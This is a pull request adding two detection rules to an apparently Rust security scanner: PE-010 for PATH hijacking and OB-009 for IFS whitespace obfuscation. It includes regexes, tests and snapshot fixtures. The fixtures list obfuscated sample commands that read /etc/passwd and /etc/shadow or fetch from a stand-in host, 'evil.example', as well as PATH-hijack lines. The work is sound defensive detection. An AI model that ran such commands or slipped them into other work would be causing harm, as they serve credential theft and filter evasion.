### PR TITLE
feat(rules): add PE-010 PATH hijacking + OB-009 IFS obfuscation

### DIFF
--- a/src/rules/builtin/obfuscation.rs
+++ b/src/rules/builtin/obfuscation.rs
@@ -11,6 +11,7 @@ pub fn rules() -> Vec<Rule> {
         ob_006(),
         ob_007(),
         ob_008(),
+        ob_009(),
     ]
 }
 
@@ -335,6 +336,37 @@ fn ob_008() -> Rule {
     }
 }
 
+fn ob_009() -> Rule {
+    Rule {
+        id: "OB-009",
+        name: "IFS whitespace obfuscation",
+        description: "Detects ${IFS}/$IFS used in place of spaces to obfuscate commands and evade whitespace-based filtering (MITRE T1027)",
+        severity: Severity::High,
+        category: Category::Obfuscation,
+        confidence: Confidence::Firm,
+        patterns: vec![
+            // Canonical braced form used as a space substitute: cat${IFS}/etc/passwd
+            Regex::new(r"\$\{IFS\}").expect("OB-009: invalid regex"),
+            // Braced form with a modifier: ${IFS%??}
+            Regex::new(r"\$\{IFS[%#][^}]*\}").expect("OB-009: invalid regex"),
+            // Bare $IFS glued directly after a command token
+            Regex::new(r"[A-Za-z0-9]\$IFS").expect("OB-009: invalid regex"),
+            // Bare $IFS glued directly before a path/command token
+            Regex::new(r"\$IFS[/A-Za-z0-9.]").expect("OB-009: invalid regex"),
+        ],
+        exclusions: vec![
+            // Comment lines
+            Regex::new(r"^\s*#").expect("OB-009: invalid regex"),
+        ],
+        message: "IFS whitespace obfuscation detected: ${IFS}/$IFS is being used as a space substitute to hide a command.",
+        recommendation: "Rewrite the command with normal spacing. Legitimate scripts do not use ${IFS} to separate command arguments.",
+        fix_hint: Some(
+            "Replace ${IFS}/$IFS separators with regular whitespace and review the deobfuscated command.",
+        ),
+        cwe_ids: &["CWE-78", "CWE-95"],
+    }
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -426,5 +458,38 @@ mod tests {
         let content = include_str!("../../../tests/fixtures/rules/ob_006.txt");
         let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
         crate::assert_rule_snapshot!("ob_006", findings);
+    }
+
+    #[test]
+    fn test_ob_009_detects_ifs_obfuscation() {
+        let rule = ob_009();
+        let test_cases = vec![
+            // Malicious: ${IFS}/$IFS used as space substitutes
+            ("cat${IFS}/etc/passwd", true),
+            ("wget${IFS}-qO-${IFS}http://evil.example", true),
+            ("cat$IFS/etc/shadow", true),
+            ("X=${IFS%??};echo$X", true),
+            ("uploads${IFS}file", true),
+            // Benign: legitimate IFS assignment and quoted references
+            ("IFS=$'\\n' read -r line", false),
+            ("while IFS= read -r line; do echo \"$line\"; done", false),
+            ("echo \"$IFS\" | xxd", false),
+            ("OLD_IFS=$IFS", false),
+        ];
+
+        for (input, should_match) in test_cases {
+            let matched = rule.patterns.iter().any(|p| p.is_match(input));
+            let excluded = rule.exclusions.iter().any(|e| e.is_match(input));
+            let result = matched && !excluded;
+            assert_eq!(result, should_match, "OB-009: Failed for input: {}", input);
+        }
+    }
+
+    #[test]
+    fn snapshot_ob_009() {
+        let rule = ob_009();
+        let content = include_str!("../../../tests/fixtures/rules/ob_009.txt");
+        let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
+        crate::assert_rule_snapshot!("ob_009", findings);
     }
 }

--- a/src/rules/builtin/privilege.rs
+++ b/src/rules/builtin/privilege.rs
@@ -12,6 +12,7 @@ pub fn rules() -> Vec<Rule> {
         pe_007(),
         pe_008(),
         pe_009(),
+        pe_010(),
     ]
 }
 
@@ -279,6 +280,39 @@ fn pe_009() -> Rule {
     }
 }
 
+fn pe_010() -> Rule {
+    Rule {
+        id: "PE-010",
+        name: "PATH hijacking",
+        description: "Detects inline PATH assignments that prepend the current directory or a world-writable/temp directory, letting a planted binary shadow a real command (MITRE T1574.007)",
+        severity: Severity::High,
+        category: Category::PrivilegeEscalation,
+        confidence: Confidence::Firm,
+        patterns: vec![
+            // Value starts with the current directory: PATH=.:...
+            Regex::new(r"PATH\s*=\s*\.:").expect("PE-010: invalid regex"),
+            // Value starts with an empty element (also the current directory): PATH=:...
+            Regex::new(r"PATH\s*=\s*:").expect("PE-010: invalid regex"),
+            // Current directory as a middle element: PATH=...:.:...
+            Regex::new(r"PATH\s*=[^\n=]*:\.:").expect("PE-010: invalid regex"),
+            // Current directory as the trailing element: PATH=...:.
+            Regex::new(r"PATH\s*=[^\n=]*:\.(\s|$)").expect("PE-010: invalid regex"),
+            // World-writable/temp directory prepended
+            Regex::new(r"PATH\s*=\s*/(tmp|dev/shm|var/tmp)[:/\s]").expect("PE-010: invalid regex"),
+        ],
+        exclusions: vec![
+            // Comment lines
+            Regex::new(r"^\s*#").expect("PE-010: invalid regex"),
+        ],
+        message: "PATH hijacking detected: the current directory or a writable/temp path is placed on PATH, so a planted binary can shadow a trusted command.",
+        recommendation: "Never put '.', an empty element, or a writable directory on PATH. Use absolute paths for the commands you invoke.",
+        fix_hint: Some(
+            "Remove '.'/empty/temp entries from PATH; keep only trusted absolute directories.",
+        ),
+        cwe_ids: &["CWE-426", "CWE-427"],
+    }
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -486,5 +520,38 @@ mod tests {
         let content = include_str!("../../../tests/fixtures/rules/pe_009.txt");
         let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
         crate::assert_rule_snapshot!("pe_009", findings);
+    }
+
+    #[test]
+    fn test_pe_010_detects_path_hijacking() {
+        let rule = pe_010();
+        let test_cases = vec![
+            // Malicious: cwd/empty/temp entries on PATH
+            ("export PATH=.:$PATH", true),
+            ("export PATH=:/usr/bin", true),
+            ("PATH=/tmp/bin:$PATH sh -c id", true),
+            ("PATH=$PATH:. ./run", true),
+            ("PATH=/dev/shm:$PATH ./payload", true),
+            // Benign: trusted absolute directories
+            ("export PATH=$HOME/bin:$PATH", false),
+            ("export PATH=/usr/local/bin:$PATH", false),
+            ("PATH=$PATH:/opt/tool/bin", false),
+            ("echo $PATH", false),
+        ];
+
+        for (input, should_match) in test_cases {
+            let matched = rule.patterns.iter().any(|p| p.is_match(input));
+            let excluded = rule.exclusions.iter().any(|e| e.is_match(input));
+            let result = matched && !excluded;
+            assert_eq!(result, should_match, "PE-010: Failed for input: {}", input);
+        }
+    }
+
+    #[test]
+    fn snapshot_pe_010() {
+        let rule = pe_010();
+        let content = include_str!("../../../tests/fixtures/rules/pe_010.txt");
+        let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
+        crate::assert_rule_snapshot!("pe_010", findings);
     }
 }

--- a/tests/fixtures/rules/ob_009.snap
+++ b/tests/fixtures/rules/ob_009.snap
@@ -1,0 +1,61 @@
+---
+source: src/rules/builtin/obfuscation.rs
+expression: findings
+---
+[
+  {
+    "id": "OB-009",
+    "severity": "high",
+    "category": "obfuscation",
+    "confidence": "firm",
+    "name": "IFS whitespace obfuscation",
+    "line": 7,
+    "code": "cat${IFS}/etc/passwd",
+    "message": "IFS whitespace obfuscation detected: ${IFS}/$IFS is being used as a space substitute to hide a command.",
+    "recommendation": "Rewrite the command with normal spacing. Legitimate scripts do not use ${IFS} to separate command arguments."
+  },
+  {
+    "id": "OB-009",
+    "severity": "high",
+    "category": "obfuscation",
+    "confidence": "firm",
+    "name": "IFS whitespace obfuscation",
+    "line": 8,
+    "code": "wget${IFS}-qO-${IFS}http://evil.example",
+    "message": "IFS whitespace obfuscation detected: ${IFS}/$IFS is being used as a space substitute to hide a command.",
+    "recommendation": "Rewrite the command with normal spacing. Legitimate scripts do not use ${IFS} to separate command arguments."
+  },
+  {
+    "id": "OB-009",
+    "severity": "high",
+    "category": "obfuscation",
+    "confidence": "firm",
+    "name": "IFS whitespace obfuscation",
+    "line": 9,
+    "code": "cat$IFS/etc/shadow",
+    "message": "IFS whitespace obfuscation detected: ${IFS}/$IFS is being used as a space substitute to hide a command.",
+    "recommendation": "Rewrite the command with normal spacing. Legitimate scripts do not use ${IFS} to separate command arguments."
+  },
+  {
+    "id": "OB-009",
+    "severity": "high",
+    "category": "obfuscation",
+    "confidence": "firm",
+    "name": "IFS whitespace obfuscation",
+    "line": 10,
+    "code": "X=${IFS%??};echo$X",
+    "message": "IFS whitespace obfuscation detected: ${IFS}/$IFS is being used as a space substitute to hide a command.",
+    "recommendation": "Rewrite the command with normal spacing. Legitimate scripts do not use ${IFS} to separate command arguments."
+  },
+  {
+    "id": "OB-009",
+    "severity": "high",
+    "category": "obfuscation",
+    "confidence": "firm",
+    "name": "IFS whitespace obfuscation",
+    "line": 11,
+    "code": "uploads${IFS}file",
+    "message": "IFS whitespace obfuscation detected: ${IFS}/$IFS is being used as a space substitute to hide a command.",
+    "recommendation": "Rewrite the command with normal spacing. Legitimate scripts do not use ${IFS} to separate command arguments."
+  }
+]

--- a/tests/fixtures/rules/ob_009.txt
+++ b/tests/fixtures/rules/ob_009.txt
@@ -1,0 +1,17 @@
+# OB-009: IFS whitespace obfuscation
+# Test cases for snapshot testing
+# Detects ${IFS}/$IFS used to replace spaces in commands, evading
+# whitespace-based filtering and detection (MITRE T1027).
+
+# === Cases that SHOULD be detected ===
+cat${IFS}/etc/passwd
+wget${IFS}-qO-${IFS}http://evil.example
+cat$IFS/etc/shadow
+X=${IFS%??};echo$X
+uploads${IFS}file
+
+# === Cases that should NOT be detected (benign) ===
+IFS=$'\n' read -r line
+while IFS= read -r line; do echo "$line"; done
+echo "$IFS" | xxd
+OLD_IFS=$IFS

--- a/tests/fixtures/rules/pe_010.snap
+++ b/tests/fixtures/rules/pe_010.snap
@@ -1,0 +1,61 @@
+---
+source: src/rules/builtin/privilege.rs
+expression: findings
+---
+[
+  {
+    "id": "PE-010",
+    "severity": "high",
+    "category": "privilege_escalation",
+    "confidence": "firm",
+    "name": "PATH hijacking",
+    "line": 8,
+    "code": "export PATH=.:$PATH",
+    "message": "PATH hijacking detected: the current directory or a writable/temp path is placed on PATH, so a planted binary can shadow a trusted command.",
+    "recommendation": "Never put '.', an empty element, or a writable directory on PATH. Use absolute paths for the commands you invoke."
+  },
+  {
+    "id": "PE-010",
+    "severity": "high",
+    "category": "privilege_escalation",
+    "confidence": "firm",
+    "name": "PATH hijacking",
+    "line": 9,
+    "code": "export PATH=:/usr/bin",
+    "message": "PATH hijacking detected: the current directory or a writable/temp path is placed on PATH, so a planted binary can shadow a trusted command.",
+    "recommendation": "Never put '.', an empty element, or a writable directory on PATH. Use absolute paths for the commands you invoke."
+  },
+  {
+    "id": "PE-010",
+    "severity": "high",
+    "category": "privilege_escalation",
+    "confidence": "firm",
+    "name": "PATH hijacking",
+    "line": 10,
+    "code": "PATH=/tmp/bin:$PATH sh -c id",
+    "message": "PATH hijacking detected: the current directory or a writable/temp path is placed on PATH, so a planted binary can shadow a trusted command.",
+    "recommendation": "Never put '.', an empty element, or a writable directory on PATH. Use absolute paths for the commands you invoke."
+  },
+  {
+    "id": "PE-010",
+    "severity": "high",
+    "category": "privilege_escalation",
+    "confidence": "firm",
+    "name": "PATH hijacking",
+    "line": 11,
+    "code": "PATH=$PATH:. ./run",
+    "message": "PATH hijacking detected: the current directory or a writable/temp path is placed on PATH, so a planted binary can shadow a trusted command.",
+    "recommendation": "Never put '.', an empty element, or a writable directory on PATH. Use absolute paths for the commands you invoke."
+  },
+  {
+    "id": "PE-010",
+    "severity": "high",
+    "category": "privilege_escalation",
+    "confidence": "firm",
+    "name": "PATH hijacking",
+    "line": 12,
+    "code": "PATH=/dev/shm:$PATH ./payload",
+    "message": "PATH hijacking detected: the current directory or a writable/temp path is placed on PATH, so a planted binary can shadow a trusted command.",
+    "recommendation": "Never put '.', an empty element, or a writable directory on PATH. Use absolute paths for the commands you invoke."
+  }
+]

--- a/tests/fixtures/rules/pe_010.txt
+++ b/tests/fixtures/rules/pe_010.txt
@@ -1,0 +1,18 @@
+# PE-010: PATH hijacking
+# Test cases for snapshot testing
+# Detects inline PATH assignments that prepend the current directory or a
+# world-writable/temp directory, so a planted binary shadows a real command
+# (MITRE T1574.007).
+
+# === Cases that SHOULD be detected ===
+export PATH=.:$PATH
+export PATH=:/usr/bin
+PATH=/tmp/bin:$PATH sh -c id
+PATH=$PATH:. ./run
+PATH=/dev/shm:$PATH ./payload
+
+# === Cases that should NOT be detected (benign) ===
+export PATH=$HOME/bin:$PATH
+export PATH=/usr/local/bin:$PATH
+PATH=$PATH:/opt/tool/bin
+echo $PATH


### PR DESCRIPTION
## Summary

Continues the detection-rule expansion loop. Two new rules, each with malicious + benign fixtures and a passing false-positive gate.

| Rule | Technique | Severity | MITRE |
|------|-----------|----------|-------|
| **PE-010** PATH hijacking | inline PATH assignments that prepend `.`, an empty element, or a writable/temp dir | High | T1574.007 |
| **OB-009** IFS whitespace obfuscation | `${IFS}`/`$IFS` used as space substitutes to hide commands | High | T1027 |

Rule count **108 → 110**.

## Duplicate checks

- PATH hijacking: PS-003 only flags `export PATH` written into a shell profile (persistence); the inline privesc form (`PATH=.:$PATH cmd`) was uncovered.
- IFS: OB-004 only covered the `IFS=…read…<<<` reassignment idiom; the `${IFS}` space-substitution obfuscation was uncovered.
- Also considered and dropped a systemd `.timer` persistence rule — PS-008 already flags `.timer` units and `OnBootSec`/`OnUnitActiveSec`.

## Testing

- `cargo test` — 1723 lib tests green, new unit + snapshot tests pass
- `cargo clippy -- -D warnings` — clean
- `cargo fmt` — clean
- FP gate: each rule's benign fixture section produces zero findings

🤖 Generated with [Claude Code](https://claude.com/claude-code)